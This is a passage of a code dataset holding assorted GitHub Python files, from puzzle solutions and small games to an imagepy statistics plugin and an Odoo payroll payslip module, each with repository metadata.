'skew'),\n\t\t\t(bool, 'kurt', 'kurt')]\n\n\tdef run(self, tps, snap, data, para=None):\n\t\trst, axis = {}, (0,1)[para['axis']=='Row']\n\t\tprint(\"snap = \", snap)\n\t\tif para['sum']:rst['sum'] = snap.sum(axis=axis)\n\t\tif para['mean']:rst['mean'] = snap.mean(axis=axis)\n\t\tif para['max']:rst['max'] = snap.max(axis=axis)\n\t\tif para['min']:rst['min'] = snap.min(axis=axis)\n\t\tif para['var']:rst['var'] = snap.var(axis=axis)\n\t\tif para['std']:rst['std'] = snap.std(axis=axis)\n\t\tif para['skew']:rst['skew'] = snap.skew(axis=axis)\n\t\tif para['kurt']:rst['kurt'] = snap.kurt(axis=axis)\n\t\tcols = ['sum', 'mean', 'min', 'max', 'var', 'std', 'skew', 'kurt']\n\t\tcols = [i for i in cols if i in rst]\n\t\tself.app.show_table(pd.DataFrame(rst, columns=cols).T, tps.title+'-statistic')\n\nclass GroupStatistic(Table):\n\ttitle = 'Group Statistic'\n\n\tpara = {'major':None, 'minor':None, 'sum':True, 'mean':True,'max':False, \n\t\t'min':False,'var':False,'std':False,'skew':False,'kurt':False, 'cn':[]}\n\t\t\n\tview = [('fields', 'cn', 'field to statistic'),\n\t\t\t('field', 'major', 'group by', 'major'),\n\t\t\t('field', 'minor', 'group by', 'minor'),\n\t\t\t\n\t\t\t(bool, 'sum', 'sum'),\n\t\t\t(bool, 'mean', 'mean'),\n\t\t\t(bool, 'max', 'max'),\n\t\t\t(bool, 'min', 'min'),\n\t\t\t(bool, 'var', 'var'),\n\t\t\t(bool, 'std', 'std'),\n\t\t\t(bool, 'skew', 'skew')]\n\n\tdef run(self, tps, snap, data, para=None):\n\t\tby = [i for i in [para['major'], para['minor']] if i!='None']\n\t\tgp = data.groupby(by)[para['cn']]\n\n\t\trst = []\n\t\tdef post(a, fix): \n\t\t\ta.columns = ['%s-%s'%(i,fix) for i in a.columns]\n\t\t\treturn a\n\n\t\tif para['sum']:rst.append(post(gp.sum(), 'sum'))\n\t\tif para['mean']:rst.append(post(gp.mean(), 'mean'))\n\t\tif para['max']:rst.append(post(gp.max(), 'max'))\n\t\tif para['min']:rst.append(post(gp.min(), 'min'))\n\t\tif para['var']:rst.append(post(gp.var(), 'var'))\n\t\tif para['std']:rst.append(post(gp.std(), 'std'))\n\t\tif para['skew']:rst.append(post(gp.skew(), 'skew'))\n\n\t\tself.app.show_table(pd.concat(rst, axis=1), tps.title+'-statistic')\n\nplgs = [Statistic, GroupStatistic]","repo_name":"Image-Py/imagepy","sub_path":"imagepy/menus/Table/Statistic/statistic_plgs.py","file_name":"statistic_plgs.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":1265,"dataset":"github-code","pt":"38"} +{"seq_id":"26184027735","text":"def threeName(N):\n single_digits = ['One','Two','Three','Four','Five','Six','Seven','Eight','Nine','Ten']\n if len(N<3):\n if len(N<2):\n return single_digits(single_digits[int(N)-1])\n return a\n\ndef euler017(N):\n def tryThree(a):\n single_digits = ['','One','Two','Three','Four','Five','Six','Seven','Eight','Nine','Ten']\n double_digits = ['','Eleven','Twelve','Thirteen','Fourteen','Fifteen','Sixteen','Seventeen','Eighteen','Nineteen','Twenty']\n tens_digits = ['','Ten','Twenty','Thirty','Forty','Fifty','Sixty','Seventy','Eighty','Ninety','One Hundred']\n\n special = False\n # if int(a[:-1]) == 0:\n # pass\n # # Now we need at \n\n\n out_number = ''\n t = list(map(lambda x: int(x) , list(a)))\n if int(a)==0:\n return ''\n if int(a)<10:\n return single_digits[t[0]]\n if int(a)==10: \n return single_digits[-1]\n if int(a)<20:\n return double_digits[t[-1]]\n \n if int(a)>99:\n # we have a three digit number\n out_number += single_digits[t[0]]+' Hundred'\n\n if int(a)%100>20:\n # number \n out_number += tens_digits[t[-2]]+' '\n out_number += single_digits[t[-1]]\n return out_number\n elif int(a)%100 >10:\n out_number += double_digits[t[2]]\n return out_number\n\n return out_number\n try:\n return single_digits[t[0]]+double_digits[t[1]]+single_digits[t[2]]\n except IndexError:\n try:\n return single_digits[t[0]]+single_digits[t[1]]\n except IndexError:\n return single_digits[t[0]]\n return a\n\n\n num_places = len(str(N))\n sN = str(N)\n places = ['','Trillion','Billion','Million','Thousand','']\n np = range(0,num_places,3)\n\n\n out_word = ''\n\n for i in range(1,num_places+1,3):\n\n \n if num_places-i>3:\n if int(sN[-i-2:][:3])==0:\n continue\n # print(tryThree(sN[-i-2:][:3]),-int(i/3))\n out_word= tryThree(sN[-i-2:][:3]) +' '+ places[-int(i/3)]+out_word\n else:\n # print(sN[-i-2:][:num_places-i+1])\n # print(tryThree(sN[-i-2:][:num_places-i+1]))\n if(int(sN[-i-2:][:num_places-i+1]))==0:\n continue\n out_word = tryThree(sN[-i-2:][:num_places-i+1])+' '+places[-int(i/3)-1]+' '+out_word\n return out_word\n\n #9 zeros is 1 billion\n # 6 zeros is 1 million\n # 3 zerios is 1 thousand\n\n\n# print(euler017('4000'))\nprint(euler017('100100'))\n\n\n","repo_name":"jawjay/projectEuler","sub_path":"euler017.py","file_name":"euler017.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26619915408","text":"def Hangman (name):\n import random\n import string\n from random_word import RandomWords\n import logging\n from random import choice\n Separated_string = []\n Good_guess = []\n x = '_'\n counter_wins = 0\n counter_los = 0\n print(\"Welcome to Hangman Game\")\n letters = RandomWords()\n The_word = letters.get_random_word()\n number_of_guesses = len(The_word)\n for i in range(number_of_guesses):\n Good_guess.append('_')\n for i in range(number_of_guesses):\n Separated_string.append(The_word[:1])\n The_word = The_word[1:]\n for i in range(number_of_guesses):\n User_guess = input(\"Enter the selection of the letter you selected:\\n\")\n if x not in Good_guess:\n return 1\n if User_guess in Separated_string:\n for j in range (len(Separated_string)):\n if Separated_string[j] == User_guess:\n Good_guess[j] = Separated_string[j]\n counter_wins += 1\n number_of_guesses -= 1\n print(\"Very good,but you have more:\", number_of_guesses , \"guesses\")\n print(Good_guess)\n else:\n counter_los += 1\n number_of_guesses -= 1\n print(\"Sorry, wrong guess…you have more\", number_of_guesses, \"guesses\")\n print(Good_guess)\n\n if x in Good_guess:\n return 0\n else:\n return 1\n\n","repo_name":"Eilonasraf/Basis_Project","sub_path":"H_man.py","file_name":"H_man.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1482091299","text":"#!/usr/bin/env python\n\"\"\"\nQuery MediaWiki API for plain text of article\n\nReferences\n https://en.wikipedia.org/wiki/Parse_tree\n https://www.mediawiki.org/wiki/API:Main_page\n https://www.mediawiki.org/wiki/User:Kephir/XML_parse_tree\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport os\n\nimport sys\nimport time\nimport wptools\n\n\ndef main(title, compact, lead, test, verbose, wiki):\n start = time.time()\n data = wptools.get_html(title, lead, test, wiki, verbose)\n if test:\n print(data)\n sys.exit(os.EX_OK)\n print(wptools.text(data, lead, compact))\n if verbose:\n print(\"%5.3f seconds\" % (time.time() - start), file=sys.stderr)\n\n\nif __name__ == \"__main__\":\n desc = \"Query MediaWiki API for plain text of article\"\n argp = argparse.ArgumentParser(description=desc)\n argp.add_argument(\"title\", help=\"article title\")\n argp.add_argument(\"-c\", \"-compact\", action='store_true',\n help=\"collapse newlines\")\n argp.add_argument(\"-l\", \"-lead\", action='store_true',\n help=\"only lead section\")\n argp.add_argument(\"-t\", \"-test\", action='store_true',\n help=\"show query and exit\")\n argp.add_argument(\"-v\", \"-verbose\", action='store_true',\n help=\"HTTP status to stdout\")\n argp.add_argument(\"-w\", \"-wiki\",\n default=wptools.WPToolsFetch.ENDPOINT,\n help=\"wiki (%s)\" % wptools.WPToolsFetch.ENDPOINT)\n args = argp.parse_args()\n\n main(args.title, args.c, args.l, args.t, args.v, args.w)\n","repo_name":"akessner/monfort_wiki","sub_path":"libs/wptools_master/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70664512751","text":"from typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n\n max_sum = float('-inf')\n\n def maxPathSum(self, root: Optional[TreeNode]) -> int:\n \n self.max_sum_rec(root)\n \n return self.max_sum\n\n def max_sum_rec(self, node: Optional[TreeNode]) -> int:\n \n if not node:\n return 0\n\n maxLeft = self.max_sum_rec(node.left)\n maxRight = self.max_sum_rec(node.right)\n\n sum = node.val + maxLeft + maxRight\n leftSum = node.val + maxLeft\n rightSum = node.val + maxRight\n \n max_sum_local = max(sum, leftSum, rightSum, node.val)\n\n if max_sum_local > self.max_sum:\n self.max_sum = max_sum_local\n\n return max(leftSum, rightSum, node.val)\n","repo_name":"yang-zhang-syd/python-practice","sub_path":"124.BinaryTreeMaximumPathSum.py","file_name":"124.BinaryTreeMaximumPathSum.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27564151228","text":"#Question 1\r\n\r\n\r\n\r\nclass Cell:\r\n\r\n int_x = 0\r\n int_y = 0\r\n status= 0\r\n grid=[]\r\n def __init__(self,world,x,y,status,edge_len):\r\n self.world=world #Question 5\r\n self.edge_len=edge_len\r\n self.x = x\r\n self.y = y\r\n self.status = status\r\n counter=0\r\n def neighbours(self, x, y): #Question 6\r\n\r\n count = 0\r\n\r\n for index in [-1, 0, 1]:\r\n for ver in [-1, 0, 1]:\r\n if not index == ver == 0 and (self.grid == True or (0 <= x + index < self.edge_len and 0 <= y + ver < self.edge_len)):\r\n count += self.grid[(y + ver) % self.edge_len][(x + index) % self.edge_len]\r\n\r\n return count\r\n\r\n \r\n def birth():\r\n self.status==True\r\n def alive():\r\n self.status==False\r\n\r\n \r\n#Question 3\r\n \r\nclass World:\r\n edge_len = 0\r\n num_cell = 0\r\n num_alive_cells = 0\r\n time=0\r\n grid=[]\r\n def __init__(self,world,edge_len):\r\n self.world=world #Question 5\r\n self.num_cell = edge_len*edge_len\r\n self.grid= list(range(self.num_cell)) #Question 2\r\n for index in range(self.num_cell):\r\n self.grid[index] = Cell(self,index%self.edge_len,index//self.edge_len)\r\n\r\n def is_cell_alive(self,cord_x,cord_y):\r\n if cord_x<0 or cord_x>=self.edge_len or cord_y<0 or cord_y>=self.edge_len: #Question 4\r\n return False\r\n else:\r\n return self.grid[cord_y*self.edge_len+cord_x].alive\r\n \r\n \r\n \r\n","repo_name":"Nxumalo/System-Program","sub_path":"Prac13.py","file_name":"Prac13.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11583571224","text":"# [비숍]\n# 1799번\nimport sys\nn = int(sys.stdin.readline().rstrip())\ngraph = []\nfor _ in range(n):\n graph.append(list(map(int,sys.stdin.readline().split())))\n\nwhite = []\nblack = []\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 1:\n if (i % 2 == 0 and j % 2 == 0) or (i % 2 != 0 and j % 2 != 0):\n black.append((i, j))\n else:\n white.append((i, j))\n\ndef DFS(bishop, idx, count):\n global resultB, resultW\n if idx == len(bishop):\n x, y = bishop[idx-1]\n if (x % 2 == 0 and y % 2 == 0) or (x % 2 != 0 and y % 2 != 0):\n resultB = max(resultB, count)\n else:\n resultW = max(resultW, count)\n return\n x, y = bishop[idx]\n if stripe_01[x+y] == True or stripe_02[x-y+n-1] == True:\n DFS(bishop, idx+1, count)\n else:\n stripe_01[x+y] = True\n stripe_02[x-y+n-1] = True\n DFS(bishop, idx+1, count + 1)\n stripe_01[x+y] = False\n stripe_02[x-y+n-1] = False\n DFS(bishop, idx+1, count)\n \nresultW = 0\nresultB = 0\nstripe_01 = [False] * (n*2-1)\nstripe_02 = [False] * (n*2-1)\nif len(white) > 0:\n DFS(white, 0, 0)\nif len(black) > 0:\n DFS(black, 0, 0)\nprint(resultW + resultB)\n","repo_name":"JungChangwoo/Algorithm_PS","sub_path":"Baekjoon/BFSDFS/Bishop.py","file_name":"Bishop.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72456912752","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bookrepos', '0007_bookrepo_cover_url'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='bookrepo',\n name='created_at',\n field=models.DateTimeField(default=django.utils.timezone.now, auto_now_add=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"gitenberg-dev/giten_site","sub_path":"gitensite/apps/bookrepos/migrations/0008_auto_20150508_0015.py","file_name":"0008_auto_20150508_0015.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"38"} +{"seq_id":"1025329362","text":"class Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n boxTypes = sorted(boxTypes,key=lambda x: x[1],reverse = True)\n maxUnits = 0\n for boxType in boxTypes:\n if truckSize >0:\n if boxType[0] < truckSize:\n maxUnits += boxType[0]*boxType[1]\n truckSize -= boxType[0]\n else:\n maxUnits += (truckSize)*boxType[1]\n truckSize -= (truckSize)\n else:\n break\n return maxUnits\n \n ","repo_name":"abrahamshimekt/Competitive-Programming-Problem-Solutions","sub_path":"1710-maximum-units-on-a-truck/1710-maximum-units-on-a-truck.py","file_name":"1710-maximum-units-on-a-truck.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"560056202","text":"from abc import ABC, abstractmethod\nimport numpy as np\nfrom PIL import ImageGrab\nimport cv2\nimport settings\nfrom src.ui_automation_tools import mouse_events_monitoring\nfrom src.ui_automation_tools import keyboard_events_monitoring\nfrom src.utils import time_tools\nimport datetime\n\n\nclass ABCScreenCaster(ABC):\n\t\n\t@abstractmethod\n\tdef __init__(self, keyboard_keys_2_monitor_list):\n\t\tself.keyboard_keys_2_monitor_list = keyboard_keys_2_monitor_list\n\t\tself.paused = False\n\t\tself.current_mouse_states = None\n\t\tself.current_keyboard_states = None\n\t\tself.grid_handler = None\n\t\tself.data_storage_dir = None\n\t\t# super().__init__()\n\t\n\t@abstractmethod\n\tdef p_keyboard_key_action(self):\n\t\tif self.paused is False:\n\t\t\tprint(\"Pausing...\")\n\t\t\tself.paused = True\n\t\t\tprint(\"Paused!\")\n\t\telif self.paused is True:\n\t\t\tprint(\"Unpausing...\")\n\t\t\tself.paused = False\n\t\t\tprint(\"Unaused!\")\n\t\t\t\n\t@abstractmethod\n\tdef t_keyboard_key_action(self):\n\t\tcv2.destroyAllWindows()\n\t\t\n\t\t\n\t@abstractmethod\n\tdef lmc_action(self):\n\t\traise NotImplementedError\n\n\n\t@abstractmethod\n\tdef set_current_mouse_states(self, mouse_states):\n\t\tself.current_mouse_states = mouse_states\n\n\t@abstractmethod\n\tdef set_current_keyboard_states(self, keyboard_states):\n\t\tself.current_keyboard_states = keyboard_states\n\n\t@abstractmethod\n\tdef set_data_storage_dir(self):\n\t\tpass\n\n\t@abstractmethod\n\tdef set_handler(self):\n\t\tpass\n\n\n\n\t@abstractmethod\n\tdef pre_screen_casting_setup(self):\n\t\tself.set_handler()\n\t\tself.set_data_storage_dir()\n\t\ttime_tools.delay_timer(3)\n\t\t# Get the current states of the mouse buttons and keyboard keys and set them as the very 1st init\n\t\t# mouse & keyboard states\n\t\tinit_mouse_states = mouse_events_monitoring.get_init_mouse_states(settings.mouse_nVirtKey_dict)\n\t\tinit_keyboard_states = keyboard_events_monitoring.get_init_keyboard_states(settings.keyboard_nVirtKey_dict)\n\t\tself.set_current_mouse_states(init_mouse_states)\n\t\tself.set_current_keyboard_states(init_keyboard_states)\n\n\n\n\n\t@abstractmethod\n\tdef start_screen_casting(self, roi):\n\n\t\tself.pre_screen_casting_setup()\n\n\t\twhile True:\n\t\t\tcurrent_datetime = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n\t\t\tprintscreen = np.array(ImageGrab.grab(bbox=roi))\n\t\t\trgb_img = cv2.cvtColor(printscreen, cv2.COLOR_BGR2RGB)\n\t\t\timg_wndw_name = 'Game Client Sreen Cast of region {0}'.format(roi)\n\t\t\tcv2.namedWindow(img_wndw_name, cv2.WINDOW_NORMAL)\n\t\t\tcv2.imshow(img_wndw_name, rgb_img)\n\t\n\n","repo_name":"xaviergoby/RSAI_JARVIS","sub_path":"research_and_dev/end2end_nav/screen_casters/abc_screen_caster_class.py","file_name":"abc_screen_caster_class.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18490982976","text":"from database.mongodb_validators import validate_object_id\nfrom fastapi import HTTPException\nfrom database.mongodb import db\n\n\ndef fix_telegram_id(telegram):\n if telegram.get(\"_id\", False):\n # change ObjectID to string\n telegram[\"_id\"] = str(telegram[\"_id\"])\n return telegram\n else:\n raise ValueError(\n f\"No `_id` found! Unable to fix telegram ID for telegram: {telegram}\"\n )\n\n# Get telegram Function.\n\n\nasync def _get_telegram_or_404(id: str):\n _id = validate_object_id(id)\n telegram = await db.Telegram.find_one({\"_id\": _id})\n if telegram:\n return fix_telegram_id(telegram)\n else:\n raise HTTPException(status_code=404, detail=\"telegram not found\")\n","repo_name":"LayNath242/fast-telegram","sub_path":"utils/get_telegram.py","file_name":"get_telegram.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72393418990","text":"class Tournament:\n\n def __init__(self, specifications) -> None:\n if '_id' in specifications:\n self._id = specifications['_id']\n self._name = specifications['_name']\n self._place = specifications['_place']\n self._date_start = specifications['_date_start']\n self._date_end = specifications['_date_end']\n if '_id_stage' in specifications:\n self._id_stage = specifications['_id_stage']\n self._time_control = specifications['_time_control']\n self._description = specifications['_description']\n self._number_players = specifications['_number_players']\n if '_list_players' in specifications:\n self._list_players = specifications['_list_players']\n if '_status' in specifications:\n self._status = specifications['_status']\n else:\n self._status = 0\n if '_stage_in_progress' in specifications:\n self._stage_in_progress = specifications['_stage_in_progress']\n else:\n self._stage_in_progress = 0\n","repo_name":"AlxandrV/Chest-manager","sub_path":"model/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71745085552","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.tools import float_compare, float_is_zero\n\n\nWORK_DAY_PER_MONTH = 30\n\nclass HrPayslipInput(models.Model):\n _inherit = 'hr.payslip.input'\n\n description = fields.Text('Description')\n\n\nclass HrPayslipLine(models.Model):\n _inherit = 'hr.payslip.line'\n\n def _get_partner_id(self, credit_account):\n \"\"\"\n overridden because every employee has a partner\n \"\"\"\n return self.employee_id.partner_id.id or False\n\n\nclass HrPayslip(models.Model):\n _name = 'hr.payslip'\n _inherit = ['hr.payslip', 'mail.thread']\n journal_id = fields.Many2one('account.journal', 'Salary Journal', readonly=True, required=True,\n states={'draft': [('readonly', False)]},\n default=lambda self: self.env['account.journal'].search([('code', '=', 'SALRY')],\n limit=1),\n domain=[('code', '=', 'SALRY')])\n job_id = fields.Many2one('hr.job', string=\"Job Position\")\n branch_id = fields.Many2one('bsg_branches.bsg_branches', string=\"Branch\")\n department_id = fields.Many2one('hr.department', string=\"Department\")\n salary_payment_method = fields.Selection([('bank', 'Bank'), ('cash', 'Cash')], string=\"Salary Payment Method\")\n # employee_state = fields.Selection([\n # ('on_job', 'On Job'),\n # ('on_leave', 'On leave'),\n # ('return_from_holiday', 'Return From Holiday'),\n # ('resignation', 'Resignation'),\n # ('suspended', 'Suspended'),\n # ('service_expired', 'Service Expired'),\n # ('ending_contract_during_trial_period', 'Ending Contract During Trial Period')], string='Employee State')\n employee_state = fields.Selection([\n ('on_job', 'On Job'),\n ('on_leave', 'On leave'),\n ('return_from_holiday', 'Return From Holiday'),\n ('resignation', 'Resignation'),\n ('suspended', 'Suspended'),\n ('service_expired','Service Expired'),\n ('contract_terminated', 'Contract Terminated'),\n ('ending_contract_during_trial_period','Ending Contract During Trial Period'),\n ('deceased', 'Deceased'),\n ('suspended_case', 'Suspended for Case'),\n\n ], string='Employee State')\n category_ids = fields.Many2many(\n 'hr.employee.category',\n string='Tags')\n category_id = fields.Many2one(\n 'hr.employee.category',\n string='Tag')\n state = fields.Selection([\n ('draft', 'Draft'),\n ('verify', 'Waiting'),\n ('done', 'Done'),\n ('paid', 'Paid'),\n ('cancel', 'Rejected'),\n ], string='Status', index=True, readonly=True, copy=False, default='draft',\n help=\"\"\"* When the payslip is created the status is \\'Draft\\'\n \\n* If the payslip is under verification, the status is \\'Waiting\\'.\n \\n* If the payslip is confirmed then status is set to \\'Done\\'.\n \\n* If the payslip is paid then status is set to \\'Paid\\'.\n \\n* When user cancel payslip the status is \\'Rejected\\'.\"\"\", track_visibility='onchange')\n\n total_net = fields.Float('Total Net', compute=\"_compute_total_net\", readonly=True, store=True)\n payment_move_id = fields.Many2one('account.move', string=\"Payment Entry\", readonly=True)\n description = fields.Text('Description', readonly=True, states={'draft': [('readonly', False)]})\n pay_by_branch = fields.Boolean(string=\"Pay By Branch\")\n pay_by_branch_check = fields.Boolean(string=\"Pay By Branch Check\", compute=\"get_pay_branch_check\")\n pay_by_branch_id = fields.Many2one('bsg_branches.bsg_branches', string=\"Pay By Branch ID\")\n leave_request_id = fields.Many2one('hr.leave', string=\"Leave Request\", track_visibility=True)\n details_by_salary_rule_category = fields.One2many('hr.payslip.line','slip_id',\n compute='_compute_details_by_salary_rule_category',\n string='Details by Salary Rule Category')\n\n # @api.multi\n def _compute_details_by_salary_rule_category(self):\n for payslip in self:\n payslip.details_by_salary_rule_category = payslip.mapped('line_ids').filtered(lambda line: line.category_id)\n\n @api.depends('leave_request_id', 'state')\n def get_pay_branch_check(self):\n for rec in self:\n rec.pay_by_branch_check = False\n if not rec.leave_request_id or rec.state != 'done':\n rec.pay_by_branch_check = True\n else:\n rec.pay_by_branch_check = False\n\n\n @api.onchange('pay_by_branch')\n def onchange_pay_by_branch(self):\n if not self.pay_by_branch:\n if self.pay_by_branch_id:\n self.pay_by_branch_id = False\n\n\n\n\n\n\n\n\n @api.model\n def create(self, vals):\n res = super(HrPayslip, self).create(vals)\n if vals.get('employee_id', False):\n res.branch_id = res.employee_id.branch_id.id\n res.job_id = res.employee_id.job_id.id\n res.department_id = res.employee_id.department_id.id\n return res\n\n def get_days_diff(self, joining_date, payslip_from_date):\n if not joining_date or not payslip_from_date:\n return 30\n if joining_date >= payslip_from_date:\n delta = (joining_date - payslip_from_date)\n else:\n delta = (payslip_from_date - joining_date)\n return delta.days\n\n \n def write(self, vals):\n res = super(HrPayslip, self).write(vals)\n if vals.get('employee_id', False):\n self.branch_id = self.employee_id.branch_id.id\n self.job_id = self.employee_id.job_id.id\n self.department_id = self.employee_id.department_id.id\n return res\n\n @api.onchange('employee_id')\n def onchange_employee_reset_category_ids(self):\n if self.employee_id:\n category_ids = self.employee_id.category_ids\n if category_ids:\n self.category_ids = [(6, 0, category_ids.ids)]\n self.employee_state = self.employee_id.employee_state\n self.salary_payment_method = self.employee_id.salary_payment_method\n self.branch_id = self.employee_id.branch_id.id or False\n self.job_id = self.employee_id.job_id.id or False\n self.department_id = self.employee_id.department_id.id or False\n else:\n self.category_ids = []\n self.branch_id = False\n self.job_id = False\n self.department_id = False\n return\n\n \n @api.depends('line_ids')\n def _compute_total_net(self):\n for rec in self:\n if rec.exists() and rec.env.context.get('eos_hr_termination') and rec.hr_termination_id and rec.type == 'eos':\n rec.update({'total_net' : rec.hr_termination_id.total_eos_amount})\n else:\n net = rec.line_ids and rec.line_ids.filtered(lambda line: line.code == 'NET').total or 0.0\n rec.total_net = net\n\n \n def set_to_paid(self):\n for rec in self:\n rec.write({'state': 'paid'})\n\n \n def compute_sheet(self):\n res = super(HrPayslip, self).compute_sheet()\n no_batch_total_update = self._context.get('no_batch_total_update', False)\n for rec in self:\n if rec.payslip_run_id and not no_batch_total_update:\n net_total = sum(rec.payslip_run_id.slip_ids.mapped('total_net'))\n rec.payslip_run_id.batch_net_total = net_total\n\n return res\n\n def get_department_parent(self, department_id):\n if not department_id.parent_id:\n return department_id\n return self.get_department_parent(department_id.parent_id)\n\n\n\n\n\n\n \n def action_payslip_done(self):\n no_compute = self._context.get('no_compute', False)\n for slip in self:\n print('.............slip...........',slip)\n analytic_account_id = False\n department_id = slip.employee_id.department_id and slip.get_department_parent(\n slip.employee_id.department_id) or False\n contract_id = slip.contract_id\n branch_id = slip.employee_id.branch_id\n fleet_vehicle_id = slip.employee_id.vehicle_sticker_no and self.env['fleet.vehicle'].search(\n [('taq_number', '=', slip.employee_id.vehicle_sticker_no), ('company_id', '=', slip.employee_id.company_id.id)]) or False\n if slip.type == 'holiday':\n allowance = slip\n allowance_lines = self.sudo().with_context({'leave_id': self.id})._get_payslip_lines_by_holiday(\n allowance.contract_id.ids, allowance.id)\n number = allowance.number or self.env['ir.sequence'].next_by_code('salary.slip')\n if allowance_lines:\n if allowance.line_ids:\n allowance.line_ids.unlink()\n lines = [(0,0, line) for line in allowance_lines]\n allowance.write({'line_ids': lines, 'number': number})\n else:\n if not no_compute:\n if not slip.type == 'eos':\n slip.compute_sheet()\n slip.write({'state': 'done'})\n line_ids = []\n debit_sum = 0.0\n credit_sum = 0.0\n date = slip.date or slip.date_to\n currency = slip.company_id.currency_id or slip.journal_id.company_id.currency_id\n\n name = _('Payslip of %s') % (slip.employee_id.name)\n move_dict = {\n 'narration': name,\n 'ref': slip.number,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'move_type':'entry',\n }\n for line in slip.sudo().details_by_salary_rule_category:\n amount = currency.round(slip.credit_note and -line.total or line.total)\n if currency.is_zero(amount):\n continue\n debit_account_id = line.salary_rule_id.account_debit.id\n credit_account_id = line.salary_rule_id.account_credit.id\n\n if debit_account_id:\n if slip.type == 'holiday':\n if line.salary_rule_id.is_get_from_leave:\n debit_account_id = line.salary_rule_id.leave_debit_account_id.id\n else:\n debit_account_id = line.salary_rule_id.account_debit.id\n analytic_account_id = False\n if line.salary_rule_id.account_debit.account_type in ['income','income_other','expense','expense_direct_cost']:\n analytic_account_id = contract_id.analytic_account_id and contract_id.analytic_account_id.id or False\n print('............asdad.analytic_account_id.........',analytic_account_id)\n debit_line = (0, 0, {\n 'name': line.name,\n 'partner_id': line._get_partner_id(credit_account=False),\n 'account_id': debit_account_id,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'debit': amount > 0.0 and amount or 0.0,\n 'credit': amount < 0.0 and -amount or 0.0,\n 'analytic_distribution': {analytic_account_id: 100},\n 'tax_line_id': line.salary_rule_id.account_tax_id.id,\n 'department_id': analytic_account_id and department_id and department_id.id or False,\n 'bsg_branches_id': analytic_account_id and branch_id and branch_id.id or False,\n 'fleet_vehicle_id': analytic_account_id and fleet_vehicle_id and fleet_vehicle_id.id or False,\n\n })\n line_ids.append(debit_line)\n debit_sum += debit_line[2]['debit'] - debit_line[2]['credit']\n\n if credit_account_id:\n if slip.type == 'holiday':\n if line.salary_rule_id.is_get_from_leave:\n credit_account_id = line.salary_rule_id.leave_credit_account_id.id\n else:\n credit_account_id = line.salary_rule_id.account_credit.id\n analytic_account_id = False\n if line.salary_rule_id.account_credit.account_type in ['income','income_other','expense','expense_direct_cost']:\n analytic_account_id = contract_id.analytic_account_id and contract_id.analytic_account_id.id or False\n print('.......dsdsdsd.....asdad.analytic_account_id.........', analytic_account_id)\n credit_line = (0, 0, {\n 'name': line.name,\n 'partner_id': line._get_partner_id(credit_account=True),\n 'account_id': credit_account_id,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'debit': amount < 0.0 and -amount or 0.0,\n 'credit': amount > 0.0 and amount or 0.0,\n 'analytic_distribution': {analytic_account_id: 100},\n 'tax_line_id': line.salary_rule_id.account_tax_id.id,\n 'department_id': analytic_account_id and department_id and department_id.id or False,\n 'bsg_branches_id': analytic_account_id and branch_id and branch_id.id or False,\n 'fleet_vehicle_id': analytic_account_id and fleet_vehicle_id and fleet_vehicle_id.id or False,\n })\n line_ids.append(credit_line)\n credit_sum += credit_line[2]['credit'] - credit_line[2]['debit']\n\n if currency.compare_amounts(credit_sum, debit_sum) == -1:\n acc_id = slip.journal_id.default_account_id.id\n if not acc_id:\n raise UserError(_('The Expense Journal \"%s\" has not properly configured the Credit Account!') % (\n slip.journal_id.name))\n adjust_credit = (0, 0, {\n 'name': _('Adjustment Entry'),\n 'partner_id': False,\n 'account_id': acc_id,\n 'journal_id': slip.journal_id.id,\n 'date': date,\n 'debit': 0.0,\n 'credit': currency.round(debit_sum - credit_sum),\n })\n line_ids.append(adjust_credit)\n\n elif currency.compare_amounts(debit_sum, credit_sum) == -1:\n acc_id = slip.journal_id.default_account_id.id\n if not acc_id:\n raise UserError(_('The Expense Journal \"%s\" has not properly configured the Debit Account!') % (\n slip.journal_id.name))\n adjust_debit = (0, 0, {\n 'name': _('Adjustment Entry'),\n 'partner_id': False,\n 